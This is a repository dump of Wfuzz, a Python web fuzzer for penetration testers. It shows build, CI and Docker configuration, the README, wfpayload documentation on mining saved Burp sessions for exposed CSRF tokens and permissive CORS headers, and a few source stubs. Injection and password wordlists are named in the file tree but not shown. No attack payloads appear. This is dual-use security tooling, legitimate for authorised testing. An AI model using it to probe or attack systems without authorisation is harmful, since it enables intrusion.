├── .flake8
├── .github
├── dependabot.yml
└── workflows
│ └── docker-release.yml
├── .gitignore
├── .travis.yml
├── Dockerfile
├── ISSUE_TEMPLATE.md
├── LICENSE
├── MANIFEST.in
├── Makefile
├── README.md
├── docs
├── Makefile
├── _static
│ ├── logo.png
│ └── logo
│ │ ├── wfuzz.svg
│ │ └── wfuzz_letters.svg
├── _templates
│ └── sidebarlogo.html
├── conf.py
├── dev
│ └── plugins.rst
├── index.rst
├── library
│ └── guide.rst
├── make.bat
└── user
│ ├── advanced.rst
│ ├── basicusage.rst
│ ├── breaking.rst
│ ├── getting.rst
│ ├── installation.rst
│ └── wfpayload.rst
├── requirements.txt
├── setup.py
├── src
├── wfencode.py
├── wfpayload.py
├── wfuzz-cli.py
├── wfuzz
│ ├── __init__.py
│ ├── __main__.py
│ ├── api.py
│ ├── core.py
│ ├── dictionaries.py
│ ├── exception.py
│ ├── externals
│ │ ├── __init__.py
│ │ ├── moduleman
│ │ │ ├── __init__.py
│ │ │ ├── loader.py
│ │ │ ├── modulefilter.py
│ │ │ ├── plugin.py
│ │ │ └── registrant.py
│ │ ├── reqresp
│ │ │ ├── Request.py
│ │ │ ├── Response.py
│ │ │ ├── TextParser.py
│ │ │ ├── Variables.py
│ │ │ ├── __init__.py
│ │ │ ├── cache.py
│ │ │ └── exceptions.py
│ │ └── settings
│ │ │ ├── __init__.py
│ │ │ └── settings.py
│ ├── facade.py
│ ├── factories
│ │ ├── __init__.py
│ │ ├── dictfactory.py
│ │ ├── fuzzfactory.py
│ │ ├── fuzzresfactory.py
│ │ ├── payman.py
│ │ ├── plugin_factory.py
│ │ └── reqresp_factory.py
│ ├── filters
│ │ ├── __init__.py
│ │ ├── ppfilter.py
│ │ └── simplefilter.py
│ ├── fuzzobjects.py
│ ├── fuzzqueues.py
│ ├── fuzzrequest.py
│ ├── helpers
│ │ ├── __init__.py
│ │ ├── file_func.py
│ │ ├── obj_dic.py
│ │ ├── obj_dyn.py
│ │ ├── obj_factory.py
│ │ ├── str_func.py
│ │ └── utils.py
│ ├── mixins.py
│ ├── myhttp.py
│ ├── myqueues.py
│ ├── options.py
│ ├── plugin_api
│ │ ├── __init__.py
│ │ ├── base.py
│ │ ├── mixins.py
│ │ ├── payloadtools.py
│ │ └── urlutils.py
│ ├── plugins
│ │ ├── __init__.py
│ │ ├── encoders
│ │ │ ├── __init__.py
│ │ │ └── encoders.py
│ │ ├── iterators
│ │ │ ├── __init__.py
│ │ │ └── iterations.py
│ │ ├── payloads
│ │ │ ├── __init__.py
│ │ │ ├── autorize.py
│ │ │ ├── bing.py
│ │ │ ├── buffer_overflow.py
│ │ │ ├── burpitem.py
│ │ │ ├── burplog.py
│ │ │ ├── burpstate.py
│ │ │ ├── dirwalk.py
│ │ │ ├── file.py
│ │ │ ├── guitab.py
│ │ │ ├── hexrand.py
│ │ │ ├── hexrange.py
│ │ │ ├── ipnet.py
│ │ │ ├── iprange.py
│ │ │ ├── list.py
│ │ │ ├── names.py
│ │ │ ├── permutation.py
│ │ │ ├── range.py
│ │ │ ├── shodanp.py
│ │ │ ├── stdin.py
│ │ │ └── wfuzzp.py
│ │ ├── printers
│ │ │ ├── __init__.py
│ │ │ └── printers.py
│ │ └── scripts
│ │ │ ├── __init__.py
│ │ │ ├── backups.py
│ │ │ ├── cookies.py
│ │ │ ├── cvs_extractor.py
│ │ │ ├── errors.py
│ │ │ ├── grep.py
│ │ │ ├── headers.py
│ │ │ ├── links.py
│ │ │ ├── listing.py
│ │ │ ├── npm_deps.py
│ │ │ ├── robots.py
│ │ │ ├── screenshot.py
│ │ │ ├── sitemap.py
│ │ │ ├── svn_extractor.py
│ │ │ ├── title.py
│ │ │ └── wcdb.py
│ ├── ui
│ │ ├── __init__.py
│ │ ├── console
│ │ │ ├── __init__.py
│ │ │ ├── clparser.py
│ │ │ ├── common.py
│ │ │ ├── getch.py
│ │ │ ├── mvc.py
│ │ │ └── output.py
│ │ └── gui
│ │ │ ├── __init__.py
│ │ │ ├── controller.py
│ │ │ ├── guicontrols.py
│ │ │ └── model.py
│ └── wfuzz.py
└── wxfuzz.py
├── tests
├── acceptance
│ └── test_saved_filter.py
├── api
│ ├── test_encoders.py
│ ├── test_payload.py
│ └── test_session.py
├── conftest.py
├── factories
│ └── test_seedbasebuilder.py
├── filters
│ ├── test_filter.py
│ ├── test_filter_codes.py
│ ├── test_filter_urlp.py
│ ├── test_prefilter_mangle.py
│ └── test_prefilter_mangle_codes.py
├── helpers
│ ├── test_dotdict.py
│ └── test_insensitive_dict.py
├── plugins
│ ├── test_burplog.py
│ ├── test_links.py
│ └── test_summary.py
├── server_dir
│ ├── Dockerfile
│ ├── dir
│ │ ├── a
│ │ ├── b
│ │ ├── c
│ │ └── one
│ ├── docker-compose.yml
│ ├── iterators
│ │ ├── aa
│ │ ├── ac
│ │ └── bb
│ ├── plugins
│ │ └── robots.txt
│ ├── recursive_dir
│ │ └── a
│ │ │ └── b
│ │ │ └── c
│ │ │ └── placeholder.txt
│ ├── simple_server.py
│ └── static
│ │ └── placeholder.txt
├── test_acceptance.py
├── test_api.py
├── test_clparser.py
├── test_filterintro.py
├── test_moduleman.py
├── test_relativeurl.py
├── test_req_parse.py
└── test_reqresp.py
├── tox.ini
├── wfencode
├── wfencode.bat
├── wfpayload
├── wfpayload.bat
├── wfuzz
├── wfuzz.bat
├── wfuzz_bash_completion
├── wordlist
├── Injections
│ ├── All_attack.txt
│ ├── SQL.txt
│ ├── Traversal.txt
│ ├── XML.txt
│ ├── XSS.txt
│ └── bad_chars.txt
├── general
│ ├── admin-panels.txt
│ ├── big.txt
│ ├── catala.txt
│ ├── common.txt
│ ├── euskera.txt
│ ├── extensions_common.txt
│ ├── http_methods.txt
│ ├── medium.txt
│ ├── megabeast.txt
│ ├── mutations_common.txt
│ ├── spanish.txt
│ └── test.txt
├── others
│ ├── common_pass.txt
│ └── names.txt
├── stress
│ ├── alphanum_case.txt
│ ├── alphanum_case_extra.txt
│ ├── char.txt
│ ├── doble_uri_hex.txt
│ ├── test_ext.txt
│ └── uri_hex.txt
├── vulns
│ ├── apache.txt
│ ├── cgis.txt
│ ├── coldfusion.txt
│ ├── dirTraversal-nix.txt
│ ├── dirTraversal-win.txt
│ ├── dirTraversal.txt
│ ├── domino.txt
│ ├── fatwire.txt
│ ├── fatwire_pagenames.txt
│ ├── frontpage.txt
│ ├── iis.txt
│ ├── iplanet.txt
│ ├── jrun.txt
│ ├── netware.txt
│ ├── oracle9i.txt
│ ├── sharepoint.txt
│ ├── sql_inj.txt
│ ├── sunas.txt
│ ├── tests.txt
│ ├── tomcat.txt
│ ├── vignette.txt
│ ├── weblogic.txt
│ └── websphere.txt
└── webservices
│ ├── ws-dirs.txt
│ └── ws-files.txt
├── wxfuzz
└── wxfuzz.bat
/.flake8:
--------------------------------------------------------------------------------
1 | [flake8]
2 | max-line-length = 80
3 | select = C,E,F,W,B,B950
4 | ignore = E203, E501, W503, E402, F401, W504
5 |
--------------------------------------------------------------------------------
/.github/dependabot.yml:
--------------------------------------------------------------------------------
1 | version: 2
2 | updates:
3 |
4 | - package-ecosystem: "github-actions"
5 | directory: "/"
6 | schedule:
7 | interval: "daily"
8 |
9 | - package-ecosystem: "docker"
10 | directory: "/"
11 | schedule:
12 | interval: "daily"
13 |
14 | - package-ecosystem: "pip"
15 | directory: "/"
16 | schedule:
17 | interval: "daily"
18 |
--------------------------------------------------------------------------------
/.github/workflows/docker-release.yml:
--------------------------------------------------------------------------------
1 | name: docker-release
2 |
3 | on:
4 | release:
5 | types: [published]
6 |
7 | jobs:
8 | docker:
9 | name: Build and push Docker image
10 | runs-on: ubuntu-latest
11 | steps:
12 | - name: Checkout repo
13 | uses: actions/checkout@v2
14 |
15 | - name: Set up QEMU
16 | uses: docker/setup-qemu-action@v1
17 |
18 | - name: Set up Docker Buildx
19 | uses: docker/setup-buildx-action@v1
20 |
21 | - name: Login to ghcr.io
22 | uses: docker/login-action@v1.4.1
23 | with:
24 | registry: ghcr.io
25 | username: ${{ github.repository_owner }}
26 | password: ${{ secrets.CR_PAT }}
27 |
28 | - name: Build and push Docker images
29 | uses: docker/build-push-action@v2
30 | with:
31 | context: .
32 | file: Dockerfile
33 | push: true
34 | tags: |
35 | ghcr.io/${{ github.repository_owner }}/wfuzz:${{ github.event.release.tag_name }}
36 | ghcr.io/${{ github.repository_owner }}/wfuzz:latest
37 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | wfuzz.ini
2 |
3 | # Byte-compiled / optimized / DLL files
4 | __pycache__/
5 | *.py[cod]
6 |
7 | # C extensions
8 | *.so
9 |
10 | # Distribution / packaging
11 | .Python
12 | env/
13 | build/
14 | develop-eggs/
15 | dist/
16 | downloads/
17 | eggs/
18 | lib/
19 | lib64/
20 | parts/
21 | sdist/
22 | var/
23 | *.egg-info/
24 | .installed.cfg
25 | *.egg
26 |
27 | # PyInstaller
28 | # Usually these files are written by a python script from a template
29 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
30 | *.manifest
31 | *.spec
32 |
33 | # Installer logs
34 | pip-log.txt
35 | pip-delete-this-directory.txt
36 |
37 | # Unit test / coverage reports
38 | htmlcov/
39 | .tox/
40 | .coverage
41 | .cache
42 | nosetests.xml
43 | coverage.xml
44 |
45 | # Translations
46 | *.mo
47 | *.pot
48 |
49 | # Django stuff:
50 | *.log
51 |
52 | # Sphinx documentation
53 | docs/_build/
54 |
55 | # PyBuilder
56 | target/
57 |
58 | # vim
59 | *.swp
60 | *.swo
61 |
62 | wfuzz.ini
63 |
64 | # Jetbrains IDE
65 | .idea
66 |
--------------------------------------------------------------------------------
/.travis.yml:
--------------------------------------------------------------------------------
1 | sudo: required
2 | language: python
3 | services:
4 | - docker
5 | python:
6 | - "3.4"
7 | - "3.5"
8 | - "3.6"
9 | - "3.7"
10 | - "3.8"
11 | before_install:
12 | - docker-compose -f tests/server_dir/docker-compose.yml up -d
13 | install:
14 | - make install-dev
15 | - python setup.py install
16 |
17 | script:
18 | - flake8 src tests
19 | - coverage run --append -m unittest discover -v -s tests/
20 | - if [[ $TRAVIS_PYTHON_VERSION == '3.6' && $TRAVIS_BRANCH == 'master' ]]; then codecov; fi
21 | - if [[ $TRAVIS_PYTHON_VERSION != '3.4' && $TRAVIS_PYTHON_VERSION != '3.5' ]]; then black --check src tests; fi
22 | deploy:
23 | provider: pypi
24 | user: x4vi_mendez
25 | password:
26 | secure: qE2hD6gyopogdJh6Qs9B1s8LkTLiZ2b4jZzDojDOnhITve2hosOfoi2T/a9JrRxP9xeMJmt7t4B7F6h+qiSdi6fz2CLT8qAG5zJFfk/+ZqIQX3zvhthoG6QS8F4Qk7kNDMuaMOeMF3qtK5oSR/cqBY3Fs7SiF9wmH2OH7XBjFdOhRzs7Y8vVEXfxy6O4wHqXkwa6ZHXfuFPly/aZGj8CwlVF4qT6zQGpOrTAJneUonQGei2qIBGVSMSLGXHxndN3a1/RA0L+J3jZKb7zi6XyqAJvXTa3OqbxwSSEdLlUdzPrjLPuMuArgTgDErgSiDlwbceDwx7TlBJy2VEF2OwQ9KAIQFKkE6Rp/sp38l3Dnriv8gzi7N0sdaSAMDH5n8zvl6xJ5hqOnB+1jfpEiSQmvr7chi3OxpniG0eW9ThgZOSLjGp0TXGSh9P3jAiZPlt1HWmNoiwOuTwjue0Lx0MH2vYW1smHJSM+FMbdCL1GwFMsEmBX+2bFzaniuyUEmM5GBpj66Pa9yULho4FTC00Aumffl2A7gnSinYwLzjIB3zUMWFzZBaijLr8caeTYMnMdccNYxWcU4kE1h584FGtMDAO8IdEwW907ZTn0H/sTrb+lFs+x3H4oLc9i+/9j/K1G3jrKJfcTOuMm4D9df+lcfgRCQzB6RyiHJWlEdGEBrJM=
27 | distributions: sdist bdist_wheel
28 | on:
29 | branch:
30 | - master
31 | - /^v.*$/
32 | tags: true
33 | python: 3.6
34 | addons:
35 | apt:
36 | packages:
37 | - libcurl4-openssl-dev
38 |
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.8-alpine3.12 as builder
2 |
3 | RUN apk add --no-cache build-base curl-dev
4 |
5 | COPY . wfuzz/
6 |
7 | WORKDIR wfuzz/
8 |
9 | RUN python setup.py install
10 |
11 |
12 | FROM python:3.8-alpine3.12
13 |
14 | RUN apk add --no-cache curl-dev
15 |
16 | COPY --from=builder /usr/local /usr/local
17 |
18 | CMD wfuzz
19 |
--------------------------------------------------------------------------------
/ISSUE_TEMPLATE.md:
--------------------------------------------------------------------------------
1 | # Issue template
2 |
3 | ## Context
4 |
5 | **Please check:**
6 |
7 | - [ ] I've read the docs for [Wfuzz](http://wfuzz.readthedocs.io/)
8 |
9 | **Please describe your local environment:**
10 |
11 | Wfuzz version: Output of wfuzz --version
12 |
13 | Python version: Output of python --version
14 |
15 | OS: X
16 |
17 | ## Report
18 |
19 | **What is the current behavior?**
20 |
21 | X
22 |
23 | **What is the expected or desired behavior?**
24 |
25 | X
26 |
27 | **Please provide steps to reproduce, including exact wfuzz command executed and output:**
28 |
29 | X
30 |
31 | **Other relevant information:**
32 |
33 | X
34 |
--------------------------------------------------------------------------------
/MANIFEST.in:
--------------------------------------------------------------------------------
1 | include README.md
2 | include LICENSE
3 | include docs/*
4 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | .PHONY: docs
2 | tox:
3 | pip install tox
4 | tox --recreate
5 | test:
6 | pytest -v -s tests/
7 | flake8:
8 | black --check src tests
9 | flake8 src tests
10 | publish:
11 | pip install 'twine>=1.5.0'
12 | python setup.py sdist
13 | twine upload dist/*
14 | rm -fr build dist
15 |
16 | publish-dev:
17 | pip install 'twine>=1.5.0'
18 | python setup.py sdist
19 | twine upload --repository-url https://test.pypi.org/legacy/ dist/*
20 | rm -fr build dist
21 | docs:
22 | pip install -e ".[docs]"
23 | cd docs && make html
24 |
25 | coverage:
26 | coverage report --skip-covered --include "*python3.8/site-packages/wfuzz*" -m
27 |
28 | install: install-dev
29 | pip install -r requirements.txt
30 |
31 | install-dev:
32 | pip install -e ".[dev]"
33 |
34 | freeze:
35 | pip-compile --output-file requirements.txt setup.py
36 | help:
37 | @echo "make help Show this help message"
38 | @echo "make test Run local tests with tox"
39 | @echo "make flake8 Run the code linter(s) and print any warnings"
40 | @echo "make publish Publish pip lib to pypi"
41 | @echo "make publish-dev Publish pip lib to pypi test"
42 | @echo "make docs Create html docs"
43 | @echo "make install Install requirements"
44 | @echo "make install-dev Install dev requirements"
45 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | [](https://travis-ci.org/xmendez/wfuzz)
4 | 
5 | 
6 | 
7 | 
8 |
9 |
10 | # Wfuzz - The Web Fuzzer
11 |
12 | Wfuzz has been created to facilitate the task in web applications assessments and it is based on a simple concept: it replaces any reference to the FUZZ keyword by the value of a given payload.
13 |
14 | A payload in Wfuzz is a source of data.
15 |
16 | This simple concept allows any input to be injected in any field of an HTTP request, allowing to perform complex web security attacks in different web application components such as: parameters, authentication, forms, directories/files, headers, etc.
17 |
18 | Wfuzz is more than a web content scanner:
19 |
20 | * Wfuzz could help you to secure your web applications by finding and exploiting web application vulnerabilities. Wfuzz’s web application vulnerability scanner is supported by plugins.
21 |
22 | * Wfuzz is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Building plugins is simple and takes little more than a few minutes.
23 |
24 | * Wfuzz exposes a simple language interface to the previous HTTP requests/responses performed using Wfuzz or other tools, such as Burp. This allows you to perform manual and semi-automatic tests with full context and understanding of your actions, without relying on a web application scanner underlying implementation.
25 |
26 |
27 | It was created to facilitate the task in web applications assessments, it's a tool by pentesters for pentesters ;)
28 |
29 | ## Installation
30 |
31 | To install WFuzz, simply use pip:
32 |
33 | ```
34 | pip install wfuzz
35 | ```
36 |
37 | To run Wfuzz from a docker image, run:
38 |
39 | ```
40 | $ docker run -v $(pwd)/wordlist:/wordlist/ -it ghcr.io/xmendez/wfuzz wfuzz
41 | ```
42 |
43 | ## Documentation
44 |
45 | Documentation is available at http://wfuzz.readthedocs.io
46 |
47 | ## Download
48 |
49 | Check github releases. Latest is available at https://github.com/xmendez/wfuzz/releases/latest
50 |
--------------------------------------------------------------------------------
/docs/Makefile:
--------------------------------------------------------------------------------
1 | # Minimal makefile for Sphinx documentation
2 | #
3 |
4 | # You can set these variables from the command line.
5 | SPHINXOPTS =
6 | SPHINXBUILD = sphinx-build
7 | SPHINXPROJ = Wfuzz
8 | SOURCEDIR = .
9 | BUILDDIR = _build
10 |
11 | # Put it first so that "make" without argument is like "make help".
12 | help:
13 | @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
14 |
15 | .PHONY: help Makefile
16 |
17 | # Catch-all target: route all unknown targets to Sphinx using the new
18 | # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS).
19 | %: Makefile
20 | @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
--------------------------------------------------------------------------------
/docs/_static/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/_static/logo.png
--------------------------------------------------------------------------------
/docs/_templates/sidebarlogo.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |  }})
4 |
5 |
6 |
7 |
8 |
9 | WFuzz is a web application security fuzzer tool and library for Python.
10 |
11 |
12 |
13 | GitHub repository
14 |
15 |
16 | Be part of the Wfuzz's community via GitHub tickets and pull requests.
17 |
18 |
20 |
21 |
22 | Stay informed
23 |
24 |
25 | Don’t forget to follow my github, twitter for news, releases and feedback.
26 |
27 |
28 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
--------------------------------------------------------------------------------
/docs/dev/plugins.rst:
--------------------------------------------------------------------------------
1 | Plugin template
2 | ===============
3 |
4 | Printer template
5 | ===============
6 |
7 | Encoder template
8 | ===============
9 |
--------------------------------------------------------------------------------
/docs/make.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | pushd %~dp0
4 |
5 | REM Command file for Sphinx documentation
6 |
7 | if "%SPHINXBUILD%" == "" (
8 | set SPHINXBUILD=sphinx-build
9 | )
10 | set SOURCEDIR=.
11 | set BUILDDIR=_build
12 | set SPHINXPROJ=Wfuzz
13 |
14 | if "%1" == "" goto help
15 |
16 | %SPHINXBUILD% >NUL 2>NUL
17 | if errorlevel 9009 (
18 | echo.
19 | echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
20 | echo.installed, then set the SPHINXBUILD environment variable to point
21 | echo.to the full path of the 'sphinx-build' executable. Alternatively you
22 | echo.may add the Sphinx directory to PATH.
23 | echo.
24 | echo.If you don't have Sphinx installed, grab it from
25 | echo.http://sphinx-doc.org/
26 | exit /b 1
27 | )
28 |
29 | %SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS%
30 | goto end
31 |
32 | :help
33 | %SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS%
34 |
35 | :end
36 | popd
37 |
--------------------------------------------------------------------------------
/docs/user/breaking.rst:
--------------------------------------------------------------------------------
1 | Breaking changes
2 | =============
3 |
4 | Following https://semver.org/ versioning since Wfuzz 3.0.0.
5 |
6 | * Wfuzz 3.0.0:
7 | * In wfuzz library prefilter is a list of filters not a string.
8 | * When using --recipe, stored options that are a list are appended. Previously, the last one took precedence.
9 |
--------------------------------------------------------------------------------
/docs/user/wfpayload.rst:
--------------------------------------------------------------------------------
1 | wfpayload
2 | =========
3 |
4 | wfpayload uses the same motor as wfuzz but instead of performing HTTP requests, uses wfuzz's payload plugins to generate new content or analyse saved sessions.
5 |
6 | Generating new dictionaries
7 | -------------------
8 |
9 | You can use wfpayload to create new dictionaries::
10 |
11 | $ wfpayload -z range --zD 0-10
12 | 0
13 | 1
14 | 2
15 | 3
16 | 4
17 | 5
18 | 6
19 | 7
20 | 8
21 | 9
22 | 10
23 |
24 | The same wfuzz's syntax can be used, for example::
25 |
26 | $ wfpayload -z range --zD 0-10 --filter "FUZZ<3"
27 | 0
28 | 1
29 | 2
30 |
31 |
32 | Analysing saved sessions
33 | ------------------
34 |
35 | Previously performed HTTP requests/responses contain a treasure trove of data. You can use wfpayload to filter and analyse previously saved sessions. Wfpayload can also read sessions from external tools, such as burp.
36 |
37 | This allows you to look for new vulnerabilities or understand the underlying target without performing new HTTP requests.
38 |
39 | For example, the following will return a unique list of HTTP requests including the authtoken parameter as a GET parameter::
40 |
41 | $ wfpayload -z burplog,a_burp_log.log --slice "params.get~'authtoken'"
42 |
43 | Authtoken is the parameter used by BEA WebLogic Commerce Servers (TM) as a CSRF token, and therefore the above will find all the requests exposing the CSRF token in the URL.
44 |
45 | You can also look for specific parameters or headers, for example, the following will look for HTTP responses accepting any CORS origin::
46 |
47 | $ wfpayload -z burplog --zD burp_log_05032020.log --prefilter "r.headers.response.Access-Control-Allow-Origin='*'"
48 |
49 | It is worth noting that, if the header is not present in the response it will be return an empty value, not raising any error.
50 |
51 | You can also select the fields to show with --efield and --field, for example::
52 |
53 | $ wfpayload -z wfuzzp --zD /tmp/session --field r.params.get
54 | artist=5
55 | ...
56 |
57 | Or::
58 |
59 | $ wfpayload -z wfuzzp --zD /tmp/session --efield r.params.get
60 | 000000006: 200 99 L 272 W 3868 Ch "5 | artist=5"
61 | ...
62 |
63 | Running plugins against saved sessions
64 | -------------------
65 |
66 | Plugins can be run against a saved session. For example::
67 |
68 | $ ./wfpayload -z burplog --zD ./burp_log_05032020.log --script=headers --filter "plugins~'akamai'"
69 | ...
70 | 000000124: 302 0 L 0 W 0 Ch "https://trial-eum-clientnsv4-s.akamaihd.net/eum/getdns.txt?c=pjq71x1r7"
71 | |_ New Server header - AkamaiGHost
72 | 000000913: 200 10 L 6571 W 289832 Ch "https://assets.adobedtm.com/2eed2bf00c8bca0c98d97ffee50a306922bc8c98/satelliteLib-27b81756e778cc85cc1a2f067764cd3abf072aa9.js"
73 | |_ New Server header - AkamaiNetStorage
74 | ...
75 |
76 | Re-writing saved sessions
77 | -------------------
78 |
79 | The content of a saved session can be re-written. For example, let's say there is a session with a bunch of 404/400 results that you want to remove::
80 |
81 | $ wfpayload -z burplog --zD ./burp_log_05032020.log --hc 404 --oF /tmp/no404
82 |
83 | and then::
84 |
85 | $ wfpayload -z wfuzzp --zD /tmp/no404
86 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | #
2 | # This file is autogenerated by pip-compile
3 | # To update, run:
4 | #
5 | # pip-compile --output-file=requirements.txt setup.py
6 | #
7 | attrs==20.1.0 # via pytest
8 | chardet==3.0.4 # via wfuzz (setup.py)
9 | iniconfig==1.0.1 # via pytest
10 | more-itertools==8.5.0 # via pytest
11 | packaging==20.4 # via pytest
12 | pluggy==0.13.1 # via pytest
13 | py==1.9.0 # via pytest
14 | pycurl==7.43.0.6 # via wfuzz (setup.py)
15 | pyparsing==2.4.7 # via packaging
16 | pytest==6.0.1 # via wfuzz (setup.py)
17 | six==1.15.0 # via packaging, wfuzz (setup.py)
18 | toml==0.10.1 # via pytest
19 |
--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | import re
4 | from setuptools import setup, find_packages
5 |
6 | with open("README.md", "rb") as f:
7 | long_descr = f.read().decode("utf-8")
8 |
9 |
10 | version = re.search(
11 | r'^__version__\s*=\s*"(.*)"',
12 | open('src/wfuzz/__init__.py').read(),
13 | re.M
14 | ).group(1)
15 |
16 | docs_requires = [
17 | "Sphinx",
18 | ]
19 |
20 | dev_requires = [
21 | 'mock',
22 | 'coverage',
23 | 'codecov',
24 | 'netaddr', # tests/api/test_payload.py uses ipranges payload
25 | 'pip-tools',
26 | 'flake8==3.8.3',
27 | 'black==19.10b0;python_version>"3.5"',
28 | 'pytest',
29 | ]
30 |
31 | install_requires = [
32 | 'pycurl',
33 | 'pyparsing<2.4.2;python_version<="3.4"',
34 | 'pyparsing>=2.4*;python_version>="3.5"',
35 | 'six',
36 | 'configparser;python_version<"3.5"',
37 | 'chardet',
38 | ]
39 |
40 |
41 | if sys.platform.startswith("win"):
42 | install_requires += ["colorama>=0.4.0"]
43 |
44 |
45 | try:
46 | os.symlink('../../docs/user/advanced.rst', 'src/wfuzz/advanced.rst')
47 | setup(
48 | name="wfuzz",
49 | packages=find_packages(where='src'),
50 | package_dir={'wfuzz': 'src/wfuzz'},
51 | include_package_data=True,
52 | package_data={'wfuzz': ['*.rst']},
53 | entry_points={
54 | 'console_scripts': [
55 | 'wfuzz = wfuzz.wfuzz:main',
56 | 'wfpayload = wfuzz.wfuzz:main_filter',
57 | 'wfencode = wfuzz.wfuzz:main_encoder',
58 | ],
59 | 'gui_scripts': [
60 | 'wxfuzz = wfuzz.wfuzz:main_gui',
61 | ]
62 | },
63 | version=version,
64 | description="Wfuzz - The web fuzzer",
65 | long_description=long_descr,
66 | long_description_content_type='text/markdown',
67 | author="Xavi Mendez (@x4vi_mendez)",
68 | author_email="xmendez@edge-security.com",
69 | url="http://wfuzz.org",
70 | license="GPLv2",
71 | install_requires=install_requires,
72 | extras_require={
73 | 'dev': dev_requires,
74 | 'docs': docs_requires,
75 | },
76 | python_requires=">=2.6",
77 | classifiers=(
78 | 'Development Status :: 4 - Beta',
79 | 'Natural Language :: English',
80 | 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',
81 | 'Programming Language :: Python',
82 | 'Programming Language :: Python :: 3',
83 | 'Programming Language :: Python :: 3.4',
84 | 'Programming Language :: Python :: 3.5',
85 | 'Programming Language :: Python :: 3.6',
86 | 'Programming Language :: Python :: 3.7',
87 | 'Programming Language :: Python :: 3.8',
88 | ),
89 | )
90 | finally:
91 | os.unlink('src/wfuzz/advanced.rst')
92 |
--------------------------------------------------------------------------------
/src/wfencode.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | from wfuzz.wfuzz import main_encoder
3 |
4 | if __name__ == "__main__":
5 | main_encoder()
6 |
--------------------------------------------------------------------------------
/src/wfpayload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | from wfuzz.wfuzz import main_filter
3 |
4 | if __name__ == "__main__":
5 | main_filter()
6 |
--------------------------------------------------------------------------------
/src/wfuzz-cli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | from wfuzz.wfuzz import main
4 |
5 | if __name__ == "__main__":
6 | main()
7 |
--------------------------------------------------------------------------------
/src/wfuzz/__init__.py:
--------------------------------------------------------------------------------
1 | __title__ = "wfuzz"
2 | __version__ = "3.1.0"
3 | __build__ = 0x023000
4 | __author__ = "Xavier Mendez"
5 | __license__ = "GPL 2.0"
6 | __copyright__ = "Copyright 2011-2020 Xavier Mendez"
7 |
8 | import logging
9 | import sys
10 |
11 | import warnings
12 |
13 |
14 | # define a logging Handler
15 | console = logging.StreamHandler()
16 | console.setLevel(logging.WARNING)
17 | formatter = logging.Formatter("%(name)-12s: %(levelname)-8s %(message)s")
18 | console.setFormatter(formatter)
19 | logging.getLogger("").addHandler(console)
20 |
21 |
22 | # define warnings format
23 | def warning_on_one_line(message, category, filename, lineno, file=None, line=None):
24 | return " %s:%s: %s:%s\n" % (filename, lineno, category.__name__, message)
25 |
26 |
27 | warnings.formatwarning = warning_on_one_line
28 |
29 |
30 | try:
31 | import pycurl
32 |
33 | if "openssl".lower() not in pycurl.version.lower():
34 | warnings.warn(
35 | "Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information."
36 | )
37 |
38 | if not hasattr(pycurl, "CONNECT_TO"):
39 | warnings.warn(
40 | "Pycurl and/or libcurl version is old. CONNECT_TO option is missing. Wfuzz --ip option will not be available."
41 | )
42 |
43 | if not hasattr(pycurl, "PATH_AS_IS"):
44 | warnings.warn(
45 | "Pycurl and/or libcurl version is old. PATH_AS_IS option is missing. Wfuzz might not correctly fuzz URLS with '..'."
46 | )
47 |
48 | except ImportError:
49 | warnings.warn(
50 | "fuzz needs pycurl to run. Pycurl could be installed using the following command: $ pip install pycurl"
51 | )
52 |
53 | sys.exit(1)
54 |
55 | from .options import FuzzSession
56 | from .api import fuzz, get_payload, get_payloads, encode, decode, payload, get_session
57 |
--------------------------------------------------------------------------------
/src/wfuzz/__main__.py:
--------------------------------------------------------------------------------
1 | from .wfuzz import main
2 |
3 | main()
4 |
--------------------------------------------------------------------------------
/src/wfuzz/api.py:
--------------------------------------------------------------------------------
1 | from .options import FuzzSession
2 | from .facade import Facade
3 | from .ui.console.clparser import CLParser
4 |
5 | """
6 | Wfuzz API
7 | """
8 |
9 |
10 | def fuzz(**kwargs):
11 | return FuzzSession(**kwargs).fuzz()
12 |
13 |
14 | def get_payloads(iterator):
15 | fs = FuzzSession()
16 |
17 | return fs.get_payloads(iterator)
18 |
19 |
20 | def get_payload(iterator):
21 | fs = FuzzSession()
22 | return fs.get_payload(iterator)
23 |
24 |
25 | def encode(name, value):
26 | return Facade().encoders.get_plugin(name)().encode(value)
27 |
28 |
29 | def decode(name, value):
30 | return Facade().encoders.get_plugin(name)().decode(value)
31 |
32 |
33 | def payload(**kwargs):
34 | return FuzzSession(**kwargs).payload()
35 |
36 |
37 | def get_session(cline):
38 | cl = ["wfuzz"] + cline.split(" ")
39 | return FuzzSession(**CLParser(cl).parse_cl())
40 |
--------------------------------------------------------------------------------
/src/wfuzz/exception.py:
--------------------------------------------------------------------------------
1 | class FuzzException(Exception):
2 | pass
3 |
4 |
